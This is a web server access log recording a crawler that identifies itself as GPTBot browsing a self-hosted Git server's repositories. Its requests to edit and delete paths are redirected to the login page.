git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56427] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" +[17/Feb/2026:17:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56425] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" +[17/Feb/2026:17:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481681] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" +[17/Feb/2026:17:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11798] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" +[17/Feb/2026:17:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 26388] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:17:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 19895] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:17:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12073] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12074] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:17:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:17:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:17:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:17:06:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:17:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:17:06:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:17:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:17:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 13023] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:17:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8487] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=name&state=closed" +[17/Feb/2026:17:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9812] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:17:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 11776] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:17:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" +[17/Feb/2026:17:06:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:06:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:06:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:06:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11589] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" +[17/Feb/2026:17:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11364] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" +[17/Feb/2026:17:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" +[17/Feb/2026:17:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11364] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" +[17/Feb/2026:17:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12805] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/App.tsx" +[17/Feb/2026:17:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11367] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" +[17/Feb/2026:17:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11793] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" +[17/Feb/2026:17:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11793] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" +[17/Feb/2026:17:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11796] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/README.md" +[17/Feb/2026:17:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 11050] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 12396] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 11010] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12337] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:17:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16380] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:17:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83387] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 11021] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 880] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:17:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20303] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15997] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 12438] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:06:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:06:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:06:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 